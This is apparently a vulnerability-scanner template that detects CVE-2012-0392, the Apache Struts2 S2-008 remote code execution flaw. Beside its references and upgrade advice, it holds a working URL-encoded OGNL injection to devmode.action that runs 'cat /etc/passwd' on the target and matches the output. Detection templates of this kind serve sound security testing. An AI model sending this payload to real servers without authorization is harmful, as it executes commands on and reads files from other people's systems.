id: CVE-2012-0392 info: name: Apache Struts2 S2-008 RCE author: pikpikcu severity: critical description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 - http://www.exploit-db.com/exploits/18329 - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393 remediation: Developers should immediately upgrade to at least Struts 2.3.18. classification: cve-id: CVE-2012-0392 tags: cve2012,apache,rce,struts,java,edb,cve requests: - method: GET path: - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/21